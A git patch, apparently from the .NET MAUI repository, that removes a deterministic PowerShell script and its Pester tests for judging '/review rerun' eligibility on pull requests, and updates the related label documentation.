modify code. Write summary to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md``. +$rerunContextInstruction ## Phase 2 — Iterative Try-Fix loop For each candidate, follow this cycle: From 16321bd70513ba038a02734c22718dc41e297e3c Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:25:39 +0200 Subject: [PATCH 28/34] Move rerun implementation out of review UI PR Keep the /review rerun instruction in the AI Summary text, but remove the command implementation, rerun context generation, ready-for-rerun label changes, and related tests from this PR so they can live in the dedicated scanner PR. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/docs/agent-labels.md | 8 +- .../Resolve-RerunEligibility.Tests.ps1 | 232 --------- .github/scripts/Resolve-RerunEligibility.ps1 | 492 ------------------ .github/scripts/Review-PR.ps1 | 30 -- .github/scripts/post-ai-summary-comment.ps1 | 2 +- .github/scripts/shared/Update-AgentLabels.ps1 | 22 +- .github/workflows/review-trigger.yml | 56 +- 7 files changed, 11 insertions(+), 831 deletions(-) delete mode 100644 .github/scripts/Resolve-RerunEligibility.Tests.ps1 delete mode 100644 .github/scripts/Resolve-RerunEligibility.ps1 diff --git a/.github/docs/agent-labels.md b/.github/docs/agent-labels.md index 5793264ec9a9..d256bfc55425 100644 --- a/.github/docs/agent-labels.md +++ b/.github/docs/agent-labels.md @@ -41,14 +41,13 @@ Always applied on every completed agent run. |-------|-------|-------------|--------------| | `s/agent-reviewed` | 🔵 `#1565C0` | PR was reviewed by AI agent workflow (full 4-phase review) | Every completed agent run | -### Manual / Queue Labels +### Manual Label -Manual labels are applied by MAUI maintainers. Queue labels are applied by deterministic automation, not by AI. +Applied by MAUI maintainers, not by automation. | Label | Color | Description | Applied When | |-------|-------|-------------|--------------| | `s/agent-fix-implemented` | 🟣 `#7B1FA2` | PR author implemented the agent's suggested fix | Maintainer applies when PR author adopts agent's recommendation | -| `s/agent-ready-for-rerun` | 🟣 `#5319E7` | AI review has new PR activity and is ready for rerun | `/review rerun` finds new comments or commits after the latest AI Summary / previous rerun request | --- @@ -71,7 +70,7 @@ Review-PR.ps1 └── Non-fatal: errors warn but don't fail the workflow ``` -Most review outcome labels are applied from `Review-PR.ps1` Phase 4. The exception is `s/agent-ready-for-rerun`, which is applied by the deterministic `/review rerun` GitHub Action path after checking for new comments or commits. The rerun path does not use AI to decide whether the label applies. +Labels are applied exclusively from `Review-PR.ps1` Phase 4. No other script applies agent labels. This single-source design avoids label conflicts and simplifies debugging. ### How Labels Are Parsed @@ -140,7 +139,6 @@ is:pr label:s/agent-reviewed |------|---------| | `.github/scripts/shared/Update-AgentLabels.ps1` | Label helper module (all label logic) | | `.github/scripts/Review-PR.ps1` | Orchestrator that calls `Apply-AgentLabels` in Phase 4 | -| `.github/scripts/Resolve-RerunEligibility.ps1` | Deterministic `/review rerun` checker that can apply `s/agent-ready-for-rerun` | | `.github/skills/pr-review/SKILL.md` | Documents label system for the pr-review skill | ### Key Functions diff --git a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 b/.github/scripts/Resolve-RerunEligibility.Tests.ps1 deleted file mode 100644 index e5ca621a5b15..000000000000 --- a/.github/scripts/Resolve-RerunEligibility.Tests.ps1 +++ /dev/null @@ -1,232 +0,0 @@ -BeforeAll { - . "$PSScriptRoot/Resolve-RerunEligibility.ps1" -PRNumber 1 -CurrentCommentId 1 - - function New-TestUser { - param( - [string]$Login = 'dev-user', - [string]$Type = 'User' - ) - - [pscustomobject]@{ - login = $Login - type = $Type - } - } - - function New-TestComment { - param( - [int64]$Id, - [string]$Body, - [string]$CreatedAt, - [string]$UpdatedAt = $CreatedAt, - [string]$Login = 'dev-user', - [string]$Type = 'User', - [string]$Kind = 'issue-comment' - ) - - [pscustomobject]@{ - id = $Id - kind = $Kind - body = $Body - created_at = $CreatedAt - updated_at = $UpdatedAt - user = New-TestUser -Login $Login -Type $Type - } - } - - function New-TestCommit { - param( - [string]$Sha, - [string]$Date - ) - - [pscustomobject]@{ - sha = $Sha - commit = [pscustomobject]@{ - author = [pscustomobject]@{ date = $Date } - committer = [pscustomobject]@{ date = $Date } - } - } - } - - function New-AISummaryBody { - param([string]$Sha = 'abcdef1') - - @" - - -## AI Review Summary - - -
-Review Sessions — click to expand -
- -"@ - } -} - -Describe 'Resolve-RerunEligibility' { - It 'rejects commands when no AI Summary exists' { - $comments = @( - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-ai-summary' - } - - It 'rejects a rerun command when there are no new comments or commits' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'accepts a non-command comment after the latest AI Summary' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 2 -Body 'I pushed the requested update.' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-ai-summary' - } - - It 'does not count repeated rerun commands as evidence' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 9 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'accepts a non-command comment after the previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 9 -Body 'Follow-up detail after rerun request.' -CreatedAt '2026-05-31T09:50:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-previous-rerun' - } - - It 'does not reuse old activity from before a previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 7 -Body 'Old follow-up before the first rerun.' -CreatedAt '2026-05-31T09:40:00Z' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'no-new-comments-or-commits' - } - - It 'finds AI Summary content posted as a PR review' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' -Kind 'review' - New-TestComment -Id 2 -Body 'Follow-up after the review.' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-comment-after-ai-summary' - } - - It 'accepts a current head SHA that differs from the latest reviewed session' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody -Sha 'abcdef1') -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'fedcba9876543210' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-head-commit' - } - - It 'accepts a commit after the previous rerun command' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 8 -Body '/review rerun' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - $commits = @( - New-TestCommit -Sha 'abcdef123' -Date '2026-05-31T09:50:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits $commits -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'new-commit-after-previous-rerun' - } - - It 'rejects bot rerun comments' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' -Login 'maui-bot' -Type 'Bot' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' - - $result.Eligible | Should -BeFalse - $result.Reason | Should -Be 'bot-comment' - } - - It 'is idempotent when ready-for-rerun label already exists' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 10 -Body '/review rerun' -CreatedAt '2026-05-31T10:00:00Z' - ) - - $result = Resolve-RerunEligibility -Comments $comments -Commits @() -CurrentCommentId 10 -CurrentHeadSha 'abcdef123' -CurrentLabels @('s/agent-ready-for-rerun') - - $result.Eligible | Should -BeTrue - $result.Reason | Should -Be 'label-already-present' - } - - It 'builds deterministic rerun context with new comments and commits' { - $comments = @( - New-TestComment -Id 1 -Body (New-AISummaryBody) -CreatedAt '2026-05-31T09:00:00Z' -UpdatedAt '2026-05-31T09:30:00Z' -Login 'maui-bot' -Type 'Bot' - New-TestComment -Id 2 -Body 'New author context.' -CreatedAt '2026-05-31T09:45:00Z' - New-TestComment -Id 3 -Body '/review rerun' -CreatedAt '2026-05-31T09:50:00Z' - ) - $commits = @( - New-TestCommit -Sha 'fedcba9876543210' -Date '2026-05-31T09:48:00Z' - ) - - $context = New-RerunContextMarkdown -Comments $comments -Commits $commits -CurrentHeadSha 'fedcba9876543210' - - $context | Should -Match '# Rerun Context' - $context | Should -Match 'New non-command comments: 1' - $context | Should -Match 'New commits: 1' - $context | Should -Match '`s/agent-ready-for-rerun` present: false' - $context | Should -Match 'New author context' - $context | Should -Match 'fedcba9' - $context | Should -Not -Match '\| .*\/review rerun' - } -} diff --git a/.github/scripts/Resolve-RerunEligibility.ps1 b/.github/scripts/Resolve-RerunEligibility.ps1 deleted file mode 100644 index d388cd65cde1..000000000000 --- a/.github/scripts/Resolve-RerunEligibility.ps1 +++ /dev/null @@ -1,492 +0,0 @@ -#!/usr/bin/env pwsh -<# -.SYNOPSIS - Determines whether a /review rerun request should mark a PR ready for rerun. - -.DESCRIPTION - This script is intentionally deterministic: it never uses AI and never - inspects untrusted text semantically. A rerun is eligible only when there is - new PR activity after the previous AI Summary or previous /review rerun: - a new non-command comment, or a new commit. -#> - -param( - [Parameter(Mandatory = $true)] - [int]$PRNumber, - - [Int64]$CurrentCommentId = 0, - - [string]$Owner = 'dotnet', - [string]$Repo = 'maui', - - [string]$ContextOutputPath, - - [switch]$ApplyLabel -) - -$ErrorActionPreference = 'Stop' -$AISummaryMarker = '' -$ReadyForRerunLabel = 's/agent-ready-for-rerun' -$ReadyForRerunLabelDescription = 'AI review has new PR activity and is ready for rerun' -$ReadyForRerunLabelColor = '5319E7' - -function ConvertTo-DateTimeOffset { - param([Parameter(Mandatory = $true)]$Value) - - if ($Value -is [datetimeoffset]) { - return $Value - } - if ($Value -is [datetime]) { - return [datetimeoffset]$Value - } - return [datetimeoffset]::Parse([string]$Value, [Globalization.CultureInfo]::InvariantCulture, [Globalization.DateTimeStyles]::AssumeUniversal) -} - -function Test-RerunCommand { - param([string]$Body) - - return ([string]$Body).Trim() -match '(?i)^/review\s+rerun\s*$' -} - -function Get-ObjectDate { - param( - [Parameter(Mandatory = $true)]$Object, - [Parameter(Mandatory = $true)][string]$PropertyName - ) - - $value = $Object.$PropertyName - if ($null -eq $value) { - return $null - } - - return ConvertTo-DateTimeOffset $value -} - -function Get-LatestAISummaryComment { - param([object[]]$Comments) - - return @($Comments | - Where-Object { $_.body -and ([string]$_.body).Contains($AISummaryMarker) } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'updated_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestRerunCommentBefore { - param( - [object[]]$Comments, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) - if (-not $current) { - return $null - } - - $currentCreatedAt = Get-ObjectDate $current 'created_at' - return @($Comments | - Where-Object { - [Int64]$_.id -ne $CurrentCommentId -and - (Test-RerunCommand $_.body) -and - (Get-ObjectDate $_ 'created_at') -lt $currentCreatedAt - } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestRerunComment { - param([object[]]$Comments) - - return @($Comments | - Where-Object { Test-RerunCommand $_.body } | - Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $true }, @{ Expression = { [Int64]$_.id }; Descending = $true } | - Select-Object -First 1) -} - -function Get-LatestReviewedSha { - param([string]$AISummaryBody) - - if ([string]::IsNullOrWhiteSpace($AISummaryBody)) { - return $null - } - - $matches = [regex]::Matches($AISummaryBody, '') - if ($matches.Count -eq 0) { - return $null - } - - return $matches[$matches.Count - 1].Groups[1].Value.ToLowerInvariant() -} - -function Test-CommentIsEvidence { - param( - [Parameter(Mandatory = $true)]$Comment, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - if ([Int64]$Comment.id -eq $CurrentCommentId) { - return $false - } - if (Test-RerunCommand $Comment.body) { - return $false - } - if ($Comment.user -and $Comment.user.type -eq 'Bot') { - return $false - } - if ($Comment.user -and $Comment.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$') { - return $false - } - - return $true -} - -function Test-HasEvidenceCommentAfter { - param( - [object[]]$Comments, - [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId - ) - - return [bool]@($Comments | Where-Object { - (Test-CommentIsEvidence -Comment $_ -CurrentCommentId $CurrentCommentId) -and - (Get-ObjectDate $_ 'created_at') -gt $Checkpoint - } | Select-Object -First 1) -} - -function Test-HasCommitAfter { - param( - [object[]]$Commits, - [Parameter(Mandatory = $true)][datetimeoffset]$Checkpoint - ) - - return [bool]@($Commits | Where-Object { - $date = $null - if ($_.commit -and $_.commit.committer -and $_.commit.committer.date) { - $date = ConvertTo-DateTimeOffset $_.commit.committer.date - } elseif ($_.commit -and $_.commit.author -and $_.commit.author.date) { - $date = ConvertTo-DateTimeOffset $_.commit.author.date - } - - $date -and $date -gt $Checkpoint - } | Select-Object -First 1) -} - -function Get-CommitDate { - param($Commit) - - if ($Commit.commit -and $Commit.commit.committer -and $Commit.commit.committer.date) { - return ConvertTo-DateTimeOffset $Commit.commit.committer.date - } - if ($Commit.commit -and $Commit.commit.author -and $Commit.commit.author.date) { - return ConvertTo-DateTimeOffset $Commit.commit.author.date - } - return $null -} - -function Test-HeadDiffersFromReviewedSha { - param( - [string]$CurrentHeadSha, - [string]$LatestReviewedSha - ) - - if ([string]::IsNullOrWhiteSpace($CurrentHeadSha) -or [string]::IsNullOrWhiteSpace($LatestReviewedSha)) { - return $false - } - - return -not $CurrentHeadSha.ToLowerInvariant().StartsWith($LatestReviewedSha.ToLowerInvariant()) -} - -function ConvertTo-RerunActivityItem { - param( - [Parameter(Mandatory = $true)]$Item, - [Parameter(Mandatory = $true)][string]$Kind - ) - - $createdAt = $Item.created_at - if ($Kind -eq 'review') { - $createdAt = $Item.submitted_at - } - - $updatedAt = $Item.updated_at - if ($null -eq $updatedAt) { - $updatedAt = $createdAt - } - - return [pscustomobject]@{ - id = [Int64]$Item.id - kind = $Kind - body = [string]$Item.body - created_at = $createdAt - updated_at = $updatedAt - user = $Item.user - } -} - -function Format-MarkdownCell { - param([string]$Value) - - if ([string]::IsNullOrWhiteSpace($Value)) { - return '' - } - - $singleLine = ($Value -replace '\r?\n', ' ').Trim() - if ($singleLine.Length -gt 180) { - $singleLine = $singleLine.Substring(0, 177) + '...' - } - - return ($singleLine -replace '\|', '\|') -} - -function New-RerunContextMarkdown { - param( - [object[]]$Comments, - [object[]]$Commits, - [string]$CurrentHeadSha, - [object[]]$CurrentLabels = @() - ) - - $latestSummary = Get-LatestAISummaryComment -Comments $Comments - $latestRerun = Get-LatestRerunComment -Comments $Comments - $checkpointRerun = if ($latestRerun) { Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId ([Int64]$latestRerun.id) } else { $null } - $readyLabelPresent = @($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - - $latestReviewedSha = if ($latestSummary) { Get-LatestReviewedSha -AISummaryBody $latestSummary.body } else { $null } - $summaryUpdatedAt = if ($latestSummary) { Get-ObjectDate $latestSummary 'updated_at' } else { $null } - - $checkpoint = $summaryUpdatedAt - $checkpointReason = if ($latestSummary) { 'latest AI Summary' } else { 'none' } - if ($checkpointRerun) { - $checkpointRerunCreatedAt = Get-ObjectDate $checkpointRerun 'created_at' - if (-not $checkpoint -or $checkpointRerunCreatedAt -gt $checkpoint) { - $checkpoint = $checkpointRerunCreatedAt - $checkpointReason = 'previous /review rerun' - } - } - - $evidenceComments = @() - if ($checkpoint) { - $evidenceComments = @($Comments | Where-Object { - (Test-CommentIsEvidence -Comment $_ -CurrentCommentId 0) -and - (Get-ObjectDate $_ 'created_at') -gt $checkpoint - } | Sort-Object @{ Expression = { Get-ObjectDate $_ 'created_at' }; Descending = $false }, @{ Expression = { [Int64]$_.id }; Descending = $false }) - } - - $newCommits = @() - if ($checkpoint) { - $newCommits = @($Commits | Where-Object { - $date = Get-CommitDate $_ - $date -and $date -gt $checkpoint - } | Sort-Object @{ Expression = { Get-CommitDate $_ }; Descending = $false }) - } - - $headDiffers = Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha - $lines = [System.Collections.Generic.List[string]]::new() - $lines.Add('# Rerun Context') - $lines.Add('') - $lines.Add('This file was generated deterministically before pre-flight. No AI was used to decide or summarize this context.') - $lines.Add('') - $lines.Add('## Checkpoint') - $lines.Add('') - if ($latestSummary) { - $lines.Add("- Latest AI Summary: $($latestSummary.kind) `#$($latestSummary.id)` updated $($summaryUpdatedAt.ToString('u'))") - } else { - $lines.Add('- Latest AI Summary: not found') - } - if ($latestRerun) { - $lines.Add("- Latest `/review rerun`: comment `#$($latestRerun.id)` created $((Get-ObjectDate $latestRerun 'created_at').ToString('u'))") - } else { - $lines.Add('- Latest `/review rerun`: not found') - } - if ($checkpointRerun) { - $lines.Add("- Previous `/review rerun` checkpoint: comment `#$($checkpointRerun.id)` created $((Get-ObjectDate $checkpointRerun 'created_at').ToString('u'))") - } - if ($checkpoint) { - $lines.Add("- Activity checkpoint: $checkpointReason at $($checkpoint.ToString('u'))") - } else { - $lines.Add('- Activity checkpoint: none') - } - $lines.Add("- Latest reviewed SHA: $(if ($latestReviewedSha) { $latestReviewedSha } else { 'unknown' })") - $lines.Add("- Current head SHA: $(if ($CurrentHeadSha) { $CurrentHeadSha } else { 'unknown' })") - $lines.Add("- Current head differs from latest reviewed SHA: $($headDiffers.ToString().ToLowerInvariant())") - $lines.Add("- ``$ReadyForRerunLabel`` present: $($readyLabelPresent.ToString().ToLowerInvariant())") - $lines.Add('') - $lines.Add('## New activity since checkpoint') - $lines.Add('') - $lines.Add("- New non-command comments: $($evidenceComments.Count)") - $lines.Add("- New commits: $($newCommits.Count)") - $lines.Add('') - - if ($evidenceComments.Count -gt 0) { - $lines.Add('### New comments') - $lines.Add('') - $lines.Add('| Kind | Author | Created | Body |') - $lines.Add('|---|---|---|---|') - foreach ($comment in $evidenceComments) { - $author = if ($comment.user) { [string]$comment.user.login } else { '' } - $createdAt = (Get-ObjectDate $comment 'created_at').ToString('u') - $lines.Add("| $($comment.kind) | $(Format-MarkdownCell $author) | $createdAt | $(Format-MarkdownCell $comment.body) |") - } - $lines.Add('') - } - - if ($newCommits.Count -gt 0) { - $lines.Add('### New commits') - $lines.Add('') - $lines.Add('| SHA | Author | Date | Message |') - $lines.Add('|---|---|---|---|') - foreach ($commit in $newCommits) { - $sha = if ($commit.sha) { ([string]$commit.sha).Substring(0, [Math]::Min(7, ([string]$commit.sha).Length)) } else { '' } - $author = if ($commit.commit -and $commit.commit.author) { [string]$commit.commit.author.name } else { '' } - $date = Get-CommitDate $commit - $message = if ($commit.commit -and $commit.commit.message) { ([string]$commit.commit.message -split "`n")[0] } else { '' } - $lines.Add("| $sha | $(Format-MarkdownCell $author) | $(if ($date) { $date.ToString('u') } else { '' }) | $(Format-MarkdownCell $message) |") - } - $lines.Add('') - } - - if ($evidenceComments.Count -eq 0 -and $newCommits.Count -eq 0 -and -not $headDiffers) { - $lines.Add('No new deterministic activity was found since the checkpoint.') - $lines.Add('') - } - - return ($lines -join "`n") -} - -function Resolve-RerunEligibility { - param( - [object[]]$Comments, - [object[]]$Commits, - [Parameter(Mandatory = $true)][Int64]$CurrentCommentId, - [string]$CurrentHeadSha, - [object[]]$CurrentLabels = @() - ) - - $current = @($Comments | Where-Object { [Int64]$_.id -eq $CurrentCommentId } | Select-Object -First 1) - if (-not $current) { - return [pscustomobject]@{ Eligible = $false; Reason = 'current-comment-not-found'; Label = $ReadyForRerunLabel } - } - - if (-not (Test-RerunCommand $current.body)) { - return [pscustomobject]@{ Eligible = $false; Reason = 'not-rerun-command'; Label = $ReadyForRerunLabel } - } - - if ($current.user -and ($current.user.type -eq 'Bot' -or $current.user.login -match '(?i)^(maui-bot|github-actions)(\[bot\])?$')) { - return [pscustomobject]@{ Eligible = $false; Reason = 'bot-comment'; Label = $ReadyForRerunLabel } - } - - $latestSummary = Get-LatestAISummaryComment -Comments $Comments - if (-not $latestSummary) { - return [pscustomobject]@{ Eligible = $false; Reason = 'no-ai-summary'; Label = $ReadyForRerunLabel } - } - - if (@($CurrentLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0) { - return [pscustomobject]@{ Eligible = $true; Reason = 'label-already-present'; Label = $ReadyForRerunLabel } - } - - $summaryUpdatedAt = Get-ObjectDate $latestSummary 'updated_at' - $latestReviewedSha = Get-LatestReviewedSha -AISummaryBody $latestSummary.body - $previousRerun = Get-LatestRerunCommentBefore -Comments $Comments -CurrentCommentId $CurrentCommentId - $checkpoint = $summaryUpdatedAt - $checkpointReason = 'ai-summary' - if ($previousRerun) { - $previousRerunCreatedAt = Get-ObjectDate $previousRerun 'created_at' - if ($previousRerunCreatedAt -gt $checkpoint) { - $checkpoint = $previousRerunCreatedAt - $checkpointReason = 'previous-rerun' - } - } - - if ($checkpointReason -eq 'ai-summary' -and (Test-HeadDiffersFromReviewedSha -CurrentHeadSha $CurrentHeadSha -LatestReviewedSha $latestReviewedSha)) { - return [pscustomobject]@{ Eligible = $true; Reason = 'new-head-commit'; Label = $ReadyForRerunLabel } - } - - if (Test-HasEvidenceCommentAfter -Comments $Comments -Checkpoint $checkpoint -CurrentCommentId $CurrentCommentId) { - $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-comment-after-previous-rerun' } else { 'new-comment-after-ai-summary' } - return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } - } - - if (Test-HasCommitAfter -Commits $Commits -Checkpoint $checkpoint) { - $reason = if ($checkpointReason -eq 'previous-rerun') { 'new-commit-after-previous-rerun' } else { 'new-commit-after-ai-summary' } - return [pscustomobject]@{ Eligible = $true; Reason = $reason; Label = $ReadyForRerunLabel } - } - - return [pscustomobject]@{ Eligible = $false; Reason = 'no-new-comments-or-commits'; Label = $ReadyForRerunLabel } -} - -if ($MyInvocation.InvocationName -eq '.') { - return -} - -$issueComments = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'issue-comment' }) -$reviews = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/reviews?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review' }) -$reviewComments = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/comments?per_page=100" --paginate --jq '.[]' | ForEach-Object { ConvertTo-RerunActivityItem -Item ($_ | ConvertFrom-Json) -Kind 'review-comment' }) -$comments = @($issueComments + $reviews + $reviewComments) -$pr = gh api "repos/$Owner/$Repo/pulls/$PRNumber" | ConvertFrom-Json -$commits = @(gh api "repos/$Owner/$Repo/pulls/$PRNumber/commits?per_page=100" --paginate --jq '.[]' | ForEach-Object { $_ | ConvertFrom-Json }) -$labels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) - -if ($pr.state -ne 'open') { - throw "PR #$PRNumber is not open (state: $($pr.state))" -} - -if ($ContextOutputPath) { - $context = New-RerunContextMarkdown ` - -Comments $comments ` - -Commits $commits ` - -CurrentHeadSha $pr.head.sha ` - -CurrentLabels $labels - $contextDir = Split-Path -Parent $ContextOutputPath - if ($contextDir) { - New-Item -ItemType Directory -Force -Path $contextDir | Out-Null - } - $context | Set-Content -LiteralPath $ContextOutputPath -Encoding UTF8 - Write-Host "Wrote rerun context: $ContextOutputPath" - if ($env:GITHUB_OUTPUT) { - "context_output_path=$ContextOutputPath" >> $env:GITHUB_OUTPUT - } - if ($CurrentCommentId -eq 0 -and -not $ApplyLabel) { - exit 0 - } -} - -if ($CurrentCommentId -eq 0) { - throw "CurrentCommentId is required unless only writing ContextOutputPath." -} - -$result = Resolve-RerunEligibility ` - -Comments $comments ` - -Commits $commits ` - -CurrentCommentId $CurrentCommentId ` - -CurrentHeadSha $pr.head.sha ` - -CurrentLabels $labels - -Write-Host "Rerun eligibility: $($result.Eligible) ($($result.Reason))" - -if ($env:GITHUB_OUTPUT) { - "eligible=$($result.Eligible.ToString().ToLowerInvariant())" >> $env:GITHUB_OUTPUT - "reason=$($result.Reason)" >> $env:GITHUB_OUTPUT - "label=$($result.Label)" >> $env:GITHUB_OUTPUT -} - -if ($ApplyLabel -and $result.Eligible) { - . "$PSScriptRoot/shared/Update-AgentLabels.ps1" - Ensure-LabelExists ` - -LabelName $ReadyForRerunLabel ` - -Description $ReadyForRerunLabelDescription ` - -Color $ReadyForRerunLabelColor ` - -Owner $Owner ` - -Repo $Repo - - $alreadyPresent = @($labels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - if ($alreadyPresent) { - Write-Host " ✅ Already present: $ReadyForRerunLabel" -ForegroundColor Green - } else { - $addSucceeded = Add-Label -PRNumber $PRNumber -LabelName $ReadyForRerunLabel -Owner $Owner -Repo $Repo - $updatedLabels = @(gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" --jq '.[].name' 2>$null) - $labelIsPresent = @($updatedLabels | Where-Object { $_ -eq $ReadyForRerunLabel }).Count -gt 0 - if ($addSucceeded -or $labelIsPresent) { - Write-Host " ✅ Applied: $ReadyForRerunLabel" -ForegroundColor Green - } else { - throw "Failed to apply label: $ReadyForRerunLabel" - } - } -} diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 377b11e720d4..575dff836e2b 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1355,35 +1355,6 @@ $gateStatusForPrompt = switch ($gateResult) { default { "Gate ❌ FAILED — tests did NOT behave as expected." } } -$rerunContextInstruction = 